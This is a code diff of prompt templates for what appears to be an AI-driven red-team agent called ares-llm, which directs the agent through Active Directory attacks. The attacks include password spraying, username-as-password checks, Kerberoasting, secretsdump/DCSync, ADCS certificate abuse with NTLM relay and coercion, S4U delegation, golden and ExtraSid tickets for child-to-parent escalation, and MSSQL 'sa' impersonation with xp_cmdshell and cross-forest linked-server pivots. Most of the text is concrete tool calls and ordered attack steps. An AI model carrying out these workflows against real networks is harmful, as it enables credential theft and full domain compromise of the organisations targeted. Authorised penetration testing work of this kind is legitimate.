tools to avoid DNS issues. **PRIORITY ORDER when creds available:** +Reference the principal by username + domain only; the worker injects the credential at dispatch. If DC IP is provided, pass -dc-ip to Kerberos/LDAP tools to avoid DNS issues. **PRIORITY ORDER when creds available:** 1. gpp_password_finder + sysvol_script_search (LOW HANGING FRUIT - run first!) 2. Kerberoast for service account hashes 3. secretsdump if admin access exists diff --git a/ares-llm/templates/redteam/tasks/credaccess_kerberos.md.tera b/ares-llm/templates/redteam/tasks/credaccess_kerberos.md.tera index e484e195..86c08477 100644 --- a/ares-llm/templates/redteam/tasks/credaccess_kerberos.md.tera +++ b/ares-llm/templates/redteam/tasks/credaccess_kerberos.md.tera @@ -14,13 +14,12 @@ This ticket allows you to impersonate Administrator to the target. secretsdump( target='{{ target }}', username='{{ user }}', - no_pass=True, - ticket_path='{{ ticket }}'{% if dc_ip %}, + no_pass=True{% if dc_ip %}, dc_ip='{{ dc_ip }}'{% endif %} ) **IMPORTANT:** -- The ticket_path sets KRB5CCNAME for Kerberos auth +- Worker injects the ccache for `{{ user }}` automatically — do NOT pass `ticket_path` - no_pass=True tells secretsdump to use -k -no-pass - This will dump SAM, LSA secrets, and domain hashes if on a DC diff --git a/ares-llm/templates/redteam/tasks/credaccess_low_hanging_no_creds.md.tera b/ares-llm/templates/redteam/tasks/credaccess_low_hanging_no_creds.md.tera index 5535e0fb..9a593f2b 100644 --- a/ares-llm/templates/redteam/tasks/credaccess_low_hanging_no_creds.md.tera +++ b/ares-llm/templates/redteam/tasks/credaccess_low_hanging_no_creds.md.tera @@ -4,34 +4,43 @@ DC IP: {{ dc_ip_display }} Task ID: {{ task_id }} **CRITICAL: These techniques work WITHOUT credentials to discover passwords:** -1. username_as_password(target=DC_IP, domain=DOMAIN) - HIGH SUCCESS RATE +1. username_as_password(target=DC_IP, domain=DOMAIN{% if excluded_users %}, excluded_users='{{ excluded_users }}'{% endif %}) - HIGH SUCCESS RATE Tests if users have username=password (e.g., testuser:testuser) - Zero lockout risk, one attempt per user + Zero lockout risk, one attempt per user{% if excluded_users %} + **DO NOT include these locked-out users: {{ excluded_users }} — pass them via `excluded_users` so the worker drops them from the wordlist.**{% endif %} 2. password_policy(target=DC_IP, domain=DOMAIN) - REQUIRED BEFORE SPRAY Read the lockout threshold (e.g. "Account Lockout Threshold: 5"). You must pass it as `lockout_threshold` to every password_spray call below. If the policy says 0 / "Never", lockout is disabled — pass 0. + **NOTE: `password_policy` requires authenticated bind. With NO credentials, + skip directly to step 3 with `acknowledge_no_policy=true`.** -3. password_spray - one call per password. The tool keeps a 1-attempt safety - buffer below `lockout_threshold` and refuses to run when the budget is gone. - **Increment `attempts_used_per_account` by 1 after each spray** so successive - sprays stop before locking accounts: +3. password_spray - one call per candidate password. Pass `password='X'` to + spray a single value, or `use_common_passwords=true` for the built-in list. + The tool keeps a 1-attempt safety buffer below `lockout_threshold` and + refuses to run when the budget is gone. + **Increment `attempts_used_per_account` by 1 after each spray** so + successive sprays stop before locking accounts.{% if excluded_users %} + **Always pass `excluded_users='{{ excluded_users }}'` to skip already-locked accounts.**{% endif %} password_spray(target=DC_IP, domain=DOMAIN, password='Password1', - lockout_threshold=THRESHOLD, attempts_used_per_account=0) + lockout_threshold=THRESHOLD, attempts_used_per_account=0{% if excluded_users %}, excluded_users='{{ excluded_users }}'{% endif %}) password_spray(target=DC_IP, domain=DOMAIN, password='Welcome1', - lockout_threshold=THRESHOLD, attempts_used_per_account=1) + lockout_threshold=THRESHOLD, attempts_used_per_account=1{% if excluded_users %}, excluded_users='{{ excluded_users }}'{% endif %}) password_spray(target=DC_IP, domain=DOMAIN, password='Passw0rd!', - lockout_threshold=THRESHOLD, attempts_used_per_account=2) + lockout_threshold=THRESHOLD, attempts_used_per_account=2{% if excluded_users %}, excluded_users='{{ excluded_users }}'{% endif %}) password_spray(target=DC_IP, domain=DOMAIN, password='Winter2025', - lockout_threshold=THRESHOLD, attempts_used_per_account=3) + lockout_threshold=THRESHOLD, attempts_used_per_account=3{% if excluded_users %}, excluded_users='{{ excluded_users }}'{% endif %}) password_spray(target=DC_IP, domain=DOMAIN, password='Spring2026', - lockout_threshold=THRESHOLD, attempts_used_per_account=4) + lockout_threshold=THRESHOLD, attempts_used_per_account=4{% if excluded_users %}, excluded_users='{{ excluded_users }}'{% endif %}) + + **No-creds fallback** (when `password_policy` failed): + password_spray(target=DC_IP, domain=DOMAIN, password='Password1', + acknowledge_no_policy=true{% if excluded_users %}, excluded_users='{{ excluded_users }}'{% endif %}) If a spray returns a "lockout budget exhausted" refusal, STOP — do not retry - until the AD observation window resets. Only set `acknowledge_no_policy=true` - if password_policy itself failed and the engagement allows lockouts. + until the AD observation window resets. These are the FIRST techniques to run when you have no credentials. Report any credentials found immediately. diff --git a/ares-llm/templates/redteam/tasks/credaccess_low_hanging_with_creds.md.tera b/ares-llm/templates/redteam/tasks/credaccess_low_hanging_with_creds.md.tera index 65df4d39..d51e3020 100644 --- a/ares-llm/templates/redteam/tasks/credaccess_low_hanging_with_creds.md.tera +++ b/ares-llm/templates/redteam/tasks/credaccess_low_hanging_with_creds.md.tera @@ -2,14 +2,14 @@ Perform LOW HANGING FRUIT credential harvesting: Domain: {{ domain }} DC IP: {{ dc_ip_display }} Username: {{ user_display }} -Password: {{ password }} +Auth: password (auto-resolved at dispatch — do NOT pass password/hash/ticket fields) Task ID: {{ task_id }} -**EXECUTE IN THIS ORDER:** -1. gpp_password_finder(target=DC_IP, username=USER, password=PASS, domain=DOMAIN) -2. sysvol_script_search(target=DC_IP, username=USER, password=PASS, domain=DOMAIN) -3. ldap_search_descriptions(...) - check for passwords in LDAP descriptions -4. username_as_password(...) - check for user=password accounts +**EXECUTE IN THIS ORDER (worker injects credentials at dispatch):** +1. gpp_password_finder(target=DC_IP, username=USER, domain=DOMAIN) +2. sysvol_script_search(target=DC_IP, username=USER, domain=DOMAIN) +3. ldap_search_descriptions(target=DC_IP, username=USER, domain=DOMAIN) - check for passwords in LDAP descriptions +4. username_as_password(target=DC_IP, domain=DOMAIN) - check for user=password accounts These are HIGH SUCCESS RATE techniques that find hardcoded credentials. Report any credentials found immediately. diff --git a/ares-llm/templates/redteam/tasks/credaccess_share_spider.md.tera b/ares-llm/templates/redteam/tasks/credaccess_share_spider.md.tera index 69740d32..c9c9e5fb 100644 --- a/ares-llm/templates/redteam/tasks/credaccess_share_spider.md.tera +++ b/ares-llm/templates/redteam/tasks/credaccess_share_spider.md.tera @@ -3,12 +3,12 @@ Target: {{ target_ip }} Domain: {{ domain }} Username: {{ username }} -Password: {{ password }} +Auth: password (auto-resolved at dispatch — do NOT pass password/hash/ticket fields) Share hint: {{ share_hint }} Task ID: {{ task_id }} **INSTRUCTIONS:** -1. Use smbclient_spider(target='{{ target_ip }}', share='{{ share_param }}', username='{{ username }}', password='{{ password }}', domain='{{ domain }}') +1. Use smbclient_spider(target='{{ target_ip }}', share='{{ share_param }}', username='{{ username }}', domain='{{ domain }}') 2. Look for interesting files containing credentials: - *.txt files (passwords, connection strings) - *.xml, *.ini, *.config files (configuration with creds) diff --git a/ares-llm/templates/redteam/tasks/credaccess_spray.md.tera b/ares-llm/templates/redteam/tasks/credaccess_spray.md.tera index 5f23920c..ff5965cc 100644 --- a/ares-llm/templates/redteam/tasks/credaccess_spray.md.tera +++ b/ares-llm/templates/redteam/tasks/credaccess_spray.md.tera @@ -6,13 +6,16 @@ Task ID: {{ task_id }} {% if cred_line -%} {{ cred_line }} {% endif -%} -**EXECUTE username_as_password:** -1. First save users: save_users_to_file(target='{{ dc_ip }}', username='{{ username }}', password='{{ password }}', domain='{{ domain }}') -2. Then spray: username_as_password(target='{{ dc_ip }}', domain='{{ domain }}', users_file='/tmp/users.txt') +**EXECUTE username_as_password (worker injects credentials at dispatch):** +1. First save users: save_users_to_file(target='{{ dc_ip }}', username='{{ username }}', domain='{{ domain }}') +2. Then spray: username_as_password(target='{{ dc_ip }}', domain='{{ domain }}', users_file='/tmp/users.txt'{% if excluded_users %}, excluded_users='{{ excluded_users }}'{% endif %}) This tests if users have username=password (e.g., testuser:testuser). Zero lockout risk, one attempt per user. Report any credentials found immediately. +{% if excluded_users %} +**DO NOT auth as these locked-out users: {{ excluded_users }} — pass them via `excluded_users` so the worker drops them from the wordlist before netexec runs.** +{% endif %} {% if state_context %} ## Current Operation State diff --git a/ares-llm/templates/redteam/tasks/credaccess_with_creds.md.tera b/ares-llm/templates/redteam/tasks/credaccess_with_creds.md.tera index d391fc39..c14bbf26 100644 --- a/ares-llm/templates/redteam/tasks/credaccess_with_creds.md.tera +++ b/ares-llm/templates/redteam/tasks/credaccess_with_creds.md.tera @@ -4,7 +4,7 @@ Domain: {{ domain }} DC IP: {{ dc_ip_display }} Targets: {{ targets_display }} Username: {{ user_display }} -Credential: {{ cred_display }} +Auth: {{ cred_capability }} (auto-resolved at dispatch — do NOT pass password/hash/ticket fields) Task ID: {{ task_id }} **CRITICAL: YOU MUST EXECUTE THESE TECHNIQUES IN ORDER:** diff --git a/ares-llm/templates/redteam/tasks/exploit_adcs_enumerate.md.tera b/ares-llm/templates/redteam/tasks/exploit_adcs_enumerate.md.tera index bbd32275..a4dd9ef8 100644 --- a/ares-llm/templates/redteam/tasks/exploit_adcs_enumerate.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_adcs_enumerate.md.tera @@ -14,8 +14,8 @@ Task ID: {{ task_id }} - Max 2 attempts at certipy_find, then report failure **INSTRUCTIONS:** -1. Run certipy_find to enumerate ADCS vulnerabilities: - certipy_find(domain='{{ domain }}', username='{{ username }}', password='{{ password }}', dc_ip='{{ dc_ip }}') +1. Run certipy_find to enumerate ADCS vulnerabilities (worker injects credentials at dispatch): + certipy_find(domain='{{ domain }}', username='{{ username }}', dc_ip='{{ dc_ip }}') 2. Look for ESC1-ESC15 vulnerabilities in the output 3. Report any vulnerable templates found diff --git a/ares-llm/templates/redteam/tasks/exploit_adcs_esc.md.tera b/ares-llm/templates/redteam/tasks/exploit_adcs_esc.md.tera index edc46b3c..135aa8d2 100644 --- a/ares-llm/templates/redteam/tasks/exploit_adcs_esc.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_adcs_esc.md.tera @@ -1,22 +1,44 @@ **ADCS {{ vuln_upper }} EXPLOITATION** CA Server: {{ ca_server }} -Template: {{ template }} +{% if ca_name %}CA Name: {{ ca_name }} +{% endif %}Template: {{ template }} Domain: {{ domain }} -Task ID: {{ task_id }} +{% if dc_ip %}DC IP: {{ dc_ip }} +{% endif %}{% if username %}Username: {{ username }} +{% endif %}{% if password %}Password: {{ password }} +{% endif %}{% if admin_sid %}Admin SID: {{ admin_sid }} +{% endif %}Task ID: {{ task_id }} -**STEP BUDGET: ~25 steps max. Work efficiently!** +{% if instructions %}**INSTRUCTIONS:** +{{ instructions }} + +{% endif %}**STEP BUDGET: ~25 steps max. Work efficiently!** **HARD LIMITS:** - 'connection refused'/'timed out' -> CA unreachable, STOP immediately - 'web enrollment' error -> HTTP not available, call task_complete(failed) - Max 2 attempts per tool, then report failure +{% if not is_esc8 -%} +**CRITICAL PARAMETERS for certipy_request:** +- `ca` = CA Name ({{ ca_name }}) — the CA identifier +- `target` = CA Server IP ({{ ca_server }}) — RPC enrollment connects here +- `dc_ip` = DC IP ({{ dc_ip }}) — LDAP queries only +- Do NOT confuse `target` (CA server) with `dc_ip` (domain controller) +{% if admin_sid %}- `sid` = {{ admin_sid }} — prevents SID mismatch in certipy_auth +{% endif %} +{% endif -%} + **WORKFLOW:** {% if is_esc8 -%} -1. Start ntlmrelayx targeting the CA's web enrollment -2. Coerce DC/target to authenticate to relay -3. Relay captures cert -> certipy_auth for hash +{% if coerce_target %}Coerce Target (primary): {{ coerce_target }} (must differ from CA Server — Windows loopback blocks same-host relay) +{% endif %}{% if coerce_targets and coerce_targets | length > 1 %}Fallback Coerce Targets (try in order if primary's callback drifts): {{ coerce_targets | join(sep=", ") }} +{% endif %}{% if listener_ip %}Relay Listener: {{ listener_ip }} +{% endif %}1. Start ntlmrelayx targeting the CA's web enrollment{% if listener_ip %} bound to {{ listener_ip }}{% endif %} +2. Coerce {% if coerce_target %}{{ coerce_target }}{% else %}a DC or other target host (NOT the CA){% endif %} to authenticate to the relay +3. If the relay log shows no inbound auth (callback drift) and a credential is available, retry with `coerce_user` + `coerce_domain` set so DFSCoerce/Coercer phases can authenticate (worker injects `coerce_password`/`coerce_hash` from state){% if coerce_targets and coerce_targets | length > 1 %}; if still no callback, retry `relay_and_coerce` against the next host in the fallback list{% endif %} +4. Relay captures cert -> certipy_auth for hash {% else -%} 1. certipy_request to request certificate with alternate UPN 2. certipy_auth to get NTLM hash from certificate diff --git a/ares-llm/templates/redteam/tasks/exploit_delegation.md.tera b/ares-llm/templates/redteam/tasks/exploit_delegation.md.tera index 583b229c..1cd744ba 100644 --- a/ares-llm/templates/redteam/tasks/exploit_delegation.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_delegation.md.tera @@ -13,11 +13,11 @@ s4u_attack( target_spn='{{ target_spn }}', impersonate='Administrator', domain='{{ domain }}', - username='{{ username }}', - password='{{ password }}'{% if dc_ip %}, + username='{{ username }}'{% if dc_ip %}, dc_ip='{{ dc_ip }}'{% endif %} ) ``` +-> Worker injects the delegating account's credential at dispatch from operation state. -> Look for: 'Saving ticket in .ccache' **STEP 2: USE TICKET WITH SECRETSDUMP_KERBEROS (IMMEDIATELY AFTER!)** @@ -26,12 +26,11 @@ secretsdump_kerberos( target='{{ target_hostname }}', username='Administrator', domain='{{ domain }}', - ticket_path='', target_ip='{{ target_ip }}'{% if dc_ip %}, dc_ip='{{ dc_ip }}'{% endif %} ) ``` -**IMPORTANT:** Replace with actual .ccache path from s4u_attack output! +-> Worker selects the most recent ccache for `Administrator@{{ domain }}` from disk. **IMPORTANT:** Always use target_ip='{{ target_ip }}' to avoid DNS resolution issues! **STEP 3: ALTERNATIVE - PSEXEC_KERBEROS FOR SHELL** @@ -41,7 +40,6 @@ psexec_kerberos( target='{{ target_hostname }}', username='Administrator', domain='{{ domain }}', - ticket_path='', command='cmd /c whoami && hostname', target_ip='{{ target_ip }}'{% if dc_ip %}, dc_ip='{{ dc_ip }}'{% endif %} diff --git a/ares-llm/templates/redteam/tasks/exploit_golden_ticket.md.tera b/ares-llm/templates/redteam/tasks/exploit_golden_ticket.md.tera index 33610c3a..e3f57aff 100644 --- a/ares-llm/templates/redteam/tasks/exploit_golden_ticket.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_golden_ticket.md.tera @@ -2,22 +2,20 @@ Task ID: {{ task_id }} ## Golden Ticket Forging -Generate a golden ticket for **{{ domain }}** using the krbtgt hash. - -### Required Parameters (already obtained) -- **Domain**: `{{ domain }}` -- **Domain SID**: `{{ domain_sid }}` -- **krbtgt NTLM hash**: `{{ krbtgt_hash }}` -- **Username (RID 500)**: `{{ username }}` -{% if aes_key %}- **AES-256 key**: `{{ aes_key }}` -{% endif -%} -{% if dc_ip %}- **DC IP**: `{{ dc_ip }}` -{% endif -%} +Generate a golden ticket for **{{ domain }}** as **{{ username }}**. ### Instructions -1. Call `generate_golden_ticket` with `krbtgt_hash`, `domain_sid`, `domain`, and `username` set to `{{ username }}`. -2. The ticket will be written to `{{ username }}.ccache`. -3. Report success with the domain and ticket path. +Call `generate_golden_ticket` with **only** these arguments: + +- `domain`: `{{ domain }}` +- `username`: `{{ username }}` +{% if dc_ip %}- `dc_ip`: `{{ dc_ip }}` (optional, for SID resolution if needed) +{% endif -%} + +The dispatcher injects `krbtgt_hash`, `domain_sid`, and `aes_key` automatically +from operation state — do **NOT** pass these yourself, and do **NOT** call +`get_sid` (the SID is already in state). The tool will write the ticket to +`{{ username }}.ccache` and return the path. -**All parameters are provided above — call the tool directly. Do NOT call `get_sid`.** +Report success with the domain and ticket path. diff --git a/ares-llm/templates/redteam/tasks/exploit_mssql.md.tera b/ares-llm/templates/redteam/tasks/exploit_mssql.md.tera index 0c6bf068..8fb8764a 100644 --- a/ares-llm/templates/redteam/tasks/exploit_mssql.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_mssql.md.tera @@ -1,11 +1,30 @@ {{ base_prompt }}**MSSQL EXPLOITATION WORKFLOW (IMPERSONATION FIRST!):** +**STEP 0: MATCH CREDENTIAL FOREST TO CONNECT TARGET (cross-forest pivots)** +Before issuing any tool call, pick a `target` MSSQL host whose forest matches +the credential you intend to authenticate with. Direct Windows auth across a +forest trust **will fail** (no SID-history / no resolvable referral for SQL +logins) — even if the target MSSQL host is the one you ultimately want code +execution on. + +If `{{ target }}` belongs to a different forest than every credential you +have, change strategy: + 1. Connect to a same-forest MSSQL host (any SQL Server you have creds for + in your credential's domain). + 2. Enumerate its linked servers (STEP 5) — look for one pointing at + `{{ target }}` or its forest. + 3. Pivot across the link via `mssql_openquery` / `mssql_exec_linked` with + `impersonate_user='sa'` (STEP 6). + +The linked server's stored `sp_addlinkedsrvlogin` mapping carries the +authentication across the trust; your local Windows credential never has +to resolve in the remote forest. + **STEP 1: ENUMERATE IMPERSONATION RIGHTS (DO THIS FIRST!)** ``` mssql_enum_impersonation( target='{{ target }}', - username=, - password=, + username='', domain= ) ``` @@ -15,8 +34,7 @@ mssql_enum_impersonation( ``` mssql_impersonate( target='{{ target }}', - username=, - password=, + username='', impersonate_user='sa', query='SELECT SYSTEM_USER', domain= @@ -28,8 +46,7 @@ mssql_impersonate( ``` mssql_enable_xp_cmdshell( target='{{ target }}', - username=, - password=, + username='', impersonate_user='sa', domain= ) @@ -39,8 +56,7 @@ mssql_enable_xp_cmdshell( ``` mssql_impersonate( target='{{ target }}', - username=, - password=, + username='', impersonate_user='sa', query='EXEC xp_cmdshell ''whoami /priv''', domain= @@ -52,12 +68,47 @@ mssql_impersonate( ``` mssql_enum_linked_servers( target='{{ target }}', - username=, - password=, + username='', domain= ) ``` -> Linked servers can pivot across domain/forest trusts! + +**STEP 6: PIVOT CROSS-FOREST (mssql_exec_linked DOUBLE-HOP CAVEAT)** +`mssql_exec_linked` runs `EXEC ('...') AT [link]` which uses the connecting +user's mapped credential — this **fails on cross-forest links** without +Kerberos delegation (the classic double-hop problem). Two source-side +workarounds, in order of preference: + +1. **OPENQUERY via stored login mapping** (`mssql_openquery`) — rides the + linked server's `sp_addlinkedsrvlogin` mapping and bypasses double-hop. + First check the link has `RPC OUT` and a stored credential: + ``` + mssql_command(target='{{ target }}', ..., + command="SELECT s.name, s.is_rpc_out_enabled, l.uses_self_credential, l.remote_name + FROM sys.servers s LEFT JOIN sys.linked_logins l ON s.server_id = l.server_id;") + ``` + Then pivot: + ``` + mssql_openquery(target='{{ target }}', ..., + linked_server='SQL02', + query='SELECT SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') + ``` + +2. **EXECUTE AS LOGIN locally, then hop** — when current login has + IMPERSONATE on a high-priv login (e.g. `sa`), wrap the hop: + ``` + mssql_exec_linked(target='{{ target }}', ..., + linked_server='SQL02', + impersonate_user='sa', + query='SELECT SYSTEM_USER') + ``` + Same `impersonate_user` parameter works on `mssql_linked_enable_xpcmdshell` + and `mssql_linked_xpcmdshell`. + +If the linked server reports `is_rpc_out_enabled=1` and a non-self stored +login mapping exists, use `mssql_openquery`. Otherwise, enumerate +IMPERSONATE first and chain via `impersonate_user='sa'`. {% if creds_section %} {{ creds_section }} {% endif -%} @@ -65,7 +116,8 @@ mssql_enum_linked_servers( - Try EACH credential above - SQL accepts Windows auth - Impersonation check is HIGHEST PRIORITY (fastest path to sysadmin) - If xp_cmdshell gives NETWORK SERVICE, you may need potato attack for SYSTEM -- Linked servers enable cross-domain pivoting +- Linked servers enable cross-domain pivoting — cross-forest links REQUIRE + `mssql_openquery` or `impersonate_user='sa'` (see STEP 6) Report credentials obtained in JSON format: ```json diff --git a/ares-llm/templates/redteam/tasks/exploit_mssql_lateral.md.tera b/ares-llm/templates/redteam/tasks/exploit_mssql_lateral.md.tera index 6ceed223..75513645 100644 --- a/ares-llm/templates/redteam/tasks/exploit_mssql_lateral.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_mssql_lateral.md.tera @@ -8,8 +8,7 @@ Try each available credential against the MSSQL instance: ``` mssql_command( target='{{ target }}', - username=, - password=, + username='', command='SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER(''sysadmin'')', domain='{{ domain }}' ) @@ -20,8 +19,7 @@ mssql_command( ``` mssql_enum_impersonation( target='{{ target }}', - username=, - password=, + username='', domain='{{ domain }}' ) ``` @@ -31,8 +29,7 @@ mssql_enum_impersonation( ``` mssql_enum_linked_servers( target='{{ target }}', - username=, - password=, + username='', domain='{{ domain }}' ) ``` @@ -41,8 +38,7 @@ mssql_enum_linked_servers( ``` mssql_exec_linked( target='{{ target }}', - username=, - password=, + username='', linked_server='', query='SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER(''sysadmin'')', domain='{{ domain }}' @@ -54,8 +50,7 @@ If 'sa' is impersonatable, IMMEDIATELY exploit it: ``` mssql_impersonate( target='{{ target }}', - username=, - password=, + username='', impersonate_user='sa', query='SELECT SYSTEM_USER', domain='{{ domain }}' @@ -65,8 +60,7 @@ Then enable xp_cmdshell WITH impersonation (CRITICAL - must pass impersonate_use ``` mssql_enable_xp_cmdshell( target='{{ target }}', - username=, - password=, + username='', impersonate_user='sa', domain='{{ domain }}' ) @@ -75,8 +69,7 @@ Then run commands VIA mssql_impersonate (xp_cmdshell requires sa context!): ``` mssql_impersonate( target='{{ target }}', - username=, - password=, + username='', impersonate_user='sa', query='EXEC xp_cmdshell ''whoami /priv''', domain='{{ domain }}' @@ -89,8 +82,7 @@ If you have sysadmin but need domain creds: ``` mssql_ntlm_coerce( target='{{ target }}', - username=, - password=, + username='', listener='', domain='{{ domain }}' ) diff --git a/ares-llm/templates/redteam/tasks/exploit_trust.md.tera b/ares-llm/templates/redteam/tasks/exploit_trust.md.tera index c28c8402..4459c985 100644 --- a/ares-llm/templates/redteam/tasks/exploit_trust.md.tera +++ b/ares-llm/templates/redteam/tasks/exploit_trust.md.tera @@ -3,25 +3,117 @@ Source Domain: {{ domain }} Target Domain: {{ trusted_domain }} DC IP: {{ dc_ip }} +Auth: {{ source_auth }} (auto-resolved at dispatch — do NOT pass password/hash/ticket fields) Task ID: {{ task_id }} +{% if is_child_to_parent and has_child_krbtgt -%} +**INTRA-FOREST CHILD→PARENT — ExtraSid via child krbtgt** + +This is a parent-child intra-forest trust. SID filtering does NOT apply, so we +forge a golden ticket signed by the child krbtgt with the parent's Enterprise +Admins SID via `extra_sid`. **Do NOT call extract_trust_key, get_sid, or +create_inter_realm_ticket — those are not needed for this path.** + +The child krbtgt hash is already stored in operation state and the worker will +inject it at dispatch — call `generate_golden_ticket` with the principal-only +fields below. + +**STEP 1: FORGE EXTRASID GOLDEN TICKET** +``` +generate_golden_ticket( + domain='{{ domain }}', + target_user='Administrator', + extra_sid='{{ extra_sid_val }}-519' +) +``` +-> Saves `Administrator.ccache` in working directory +-> Worker injects `krbtgt_hash` and `domain_sid` from state automatically. + +**STEP 2: DCSync THE PARENT DC WITH THE TICKET** +``` +secretsdump_kerberos( + target='{{ target_dc_hostname | default(value="") }}', + username='Administrator', + domain='{{ trusted_domain }}', + dc_ip='{{ target_dc_hint }}', + target_ip='{{ target_dc_hint }}' +) +``` +-> Worker resolves the inter-realm/forged ccache from state automatically. +-> Success means parent krbtgt hash extracted = full DA on parent. + +**Fallback A — `-just-dc-user krbtgt` if SPN target name validation blocks DRSUAPI:** +``` +secretsdump_kerberos( + target='{{ target_dc_hostname | default(value="") }}', + username='Administrator', + domain='{{ trusted_domain }}', + dc_ip='{{ target_dc_hint }}', + target_ip='{{ target_dc_hint }}', + just_dc_user='krbtgt' +) +``` + +**Fallback B — VSS shadow-copy if DRSUAPI is fully hardened:** +``` +secretsdump_kerberos( + target='{{ target_dc_hostname | default(value="") }}', + username='Administrator', + domain='{{ trusted_domain }}', + dc_ip='{{ target_dc_hint }}', + target_ip='{{ target_dc_hint }}', + use_vss=true +) +``` + +**Fallback C — direct PTH secretsdump using the parent Administrator hash if it +has been harvested in a previous step.** The hash is stored in operation state; +the worker injects it at dispatch — do NOT include a `hash=` field yourself: +``` +secretsdump( + target='{{ target_dc_hint }}', + username='Administrator', + domain='{{ trusted_domain }}' +) +``` + +Report the parent krbtgt hash as a finding once obtained: +```json +{"hash": {"username": "krbtgt", "hash_value": "...", "hash_type": "NTLM", "domain": "{{ trusted_domain }}"}} +``` + +{% if state_context %} + +## Current Operation State + +{{ state_context }} +{% endif -%} +{% else -%} {% if has_trust_key -%} -**TRUST KEY (already extracted):** `{{ trust_key }}` +**TRUST KEY:** already extracted and stored in operation state — the worker +injects it at dispatch when you call `create_inter_realm_ticket`. {% else -%} +{% if has_source_da -%} **STEP {{ step_extract }}: EXTRACT INTER-REALM TRUST KEY** ``` extract_trust_key( domain='{{ domain }}', username='{{ username }}', - password='{{ password }}', dc_ip='{{ dc_ip }}', trusted_domain='{{ trusted_domain }}' ) ``` +-> Worker injects the source DA password/hash from state. -> Look for: trust account NTLM hash (e.g., {{ trusted_domain_prefix }}$ hash) -> Also extract AES256 key if available (needed for Windows 2016+) +{% else -%} +**STEP {{ step_extract }}: EXTRACT INTER-REALM TRUST KEY — credentials missing** +No DA-level credential or hash for `{{ domain }}` is available in operation +state. Source one first via DCSync, then retry trust key extraction. + +{% endif -%} {% endif -%} {% if needs_source_sid or needs_target_sid -%} **STEP {{ step_sid }}: RESOLVE DOMAIN SIDs** @@ -31,18 +123,17 @@ Source SID (resolve via source DC): get_sid( domain='{{ domain }}', username='{{ username }}', - password='{{ password }}', dc_ip='{{ dc_ip }}' ) ``` {% endif -%} {% if needs_target_sid -%} -Target SID (resolve via target DC using trust key for auth): +Target SID (resolve via target DC using trust key for auth — worker injects the +trust key at dispatch): ``` get_sid( domain='{{ trusted_domain }}', username='{{ username }}', - hash='{{ trust_key_or_placeholder }}', dc_ip='{{ target_dc_hint }}' ) ``` @@ -53,26 +144,29 @@ get_sid( ``` create_inter_realm_ticket( source_domain='{{ domain }}', - source_sid='{{ source_sid_val }}', - trust_key='{{ trust_key_val }}', target_domain='{{ trusted_domain }}', - target_sid='{{ target_sid_val }}', username='Administrator'{% if is_child_to_parent %}, extra_sid='{{ extra_sid_val }}-519'{% endif %} ) ``` --> Saves .ccache ticket file for cross-domain auth +-> Worker injects `source_sid`, `target_sid`, and `trust_key` from state. +-> Saves ticket to `Administrator.ccache` in working directory. **STEP {{ step_secretsdump }}: USE TICKET FOR SECRETSDUMP ON TARGET DOMAIN** +{% if target_dc_hostname -%} +Target DC hostname: `{{ target_dc_hostname }}` +Target DC IP: `{{ target_dc_hint }}` +{% endif -%} ``` secretsdump_kerberos( - target='', + target='{{ target_dc_hostname | default(value="") }}', username='Administrator', domain='{{ trusted_domain }}', - ticket_path='', - target_ip='' + dc_ip='{{ target_dc_hint }}', + target_ip='{{ target_dc_hint }}' ) ``` +-> Worker resolves the inter-realm ccache from state automatically. -> Look for krbtgt hash = DOMAIN ADMIN on target domain! -> Look for Administrator hash = full access to target domain @@ -83,49 +177,43 @@ The standard `create_inter_realm_ticket()` + `secretsdump_kerberos()` flow may f cross-forest trusts due to an impacket bug (fortra/impacket#315): `getST`/`getKerberosTGS` sends the referral TGT to the wrong KDC. -**If the standard flow fails, use the reliable forge-and-present workaround:** -1. Forge an inter-realm TGT with the trust key using `ticketer`: - ``` - impacket-ticketer -nthash \ - -domain {{ domain }} -domain-sid \ - -spn krbtgt/{{ trusted_domain }} \ - -target-domain {{ trusted_domain }} Administrator - ``` -2. Export the ticket: `export KRB5CCNAME=Administrator.ccache` -3. Run secretsdump directly against the TARGET DC (bypasses referral): - ``` - impacket-secretsdump -k -no-pass -target-ip -just-dc - ``` - -This forges the inter-realm TGT locally and presents it directly to the target DC, -avoiding the broken cross-realm referral logic entirely. +**If the standard flow fails, use the reliable forge-and-present workaround.** +The trust key, source SID, and target SID are stored in operation state — the +worker injects them at dispatch. Call: +``` +create_inter_realm_ticket( + source_domain='{{ domain }}', + target_domain='{{ trusted_domain }}', + username='Administrator' +) +``` +Then run secretsdump directly against the TARGET DC (bypasses referral): +``` +secretsdump_kerberos( + target='{{ target_dc_hostname | default(value="") }}', + username='Administrator', + domain='{{ trusted_domain }}', + dc_ip='{{ target_dc_hint }}', + target_ip='{{ target_dc_hint }}', + just_dc=true +) +``` {% endif -%} {% if is_child_to_parent -%} **ALTERNATIVE (STEP {{ step_raise_child }}): AUTOMATIC CHILD-TO-PARENT ESCALATION** If manual steps above fail, use the automated approach: ``` -{% if password -%} -raise_child( - child_domain='{{ domain }}', - username='{{ username }}', - password='{{ password }}' -) -{% elif admin_hash -%} raise_child( child_domain='{{ domain }}', username='{{ username }}', - hash='{{ admin_hash }}' -) -{% else -%} -raise_child( - child_domain='{{ domain }}', - username='{{ username }}', - password='' + dc_ip='{{ dc_ip }}', + target_ip='{{ target_dc_hint }}' ) -{% endif -%} ``` +-> Worker injects the source DA password/hash from state. -> Automates: trust key extraction + ExtraSid golden ticket + parent DC secretsdump +-> `dc_ip`/`target_ip` are mandatory when DNS cannot resolve child/parent FQDNs from the operator host. {% endif -%} **CRITICAL NOTES:** @@ -146,3 +234,4 @@ Report any hashes obtained: {{ state_context }} {% endif -%} +{% endif -%} diff --git a/ares-llm/templates/redteam/tasks/lateral.md.tera b/ares-llm/templates/redteam/tasks/lateral.md.tera index 728716c4..ea18f47d 100644 --- a/ares-llm/templates/redteam/tasks/lateral.md.tera +++ b/ares-llm/templates/redteam/tasks/lateral.md.tera @@ -2,7 +2,7 @@ **Technique:** {{ technique }} **Target:** {{ target_ip }} -{% if credential_username %}**Credential:** {{ credential_username }}@{{ 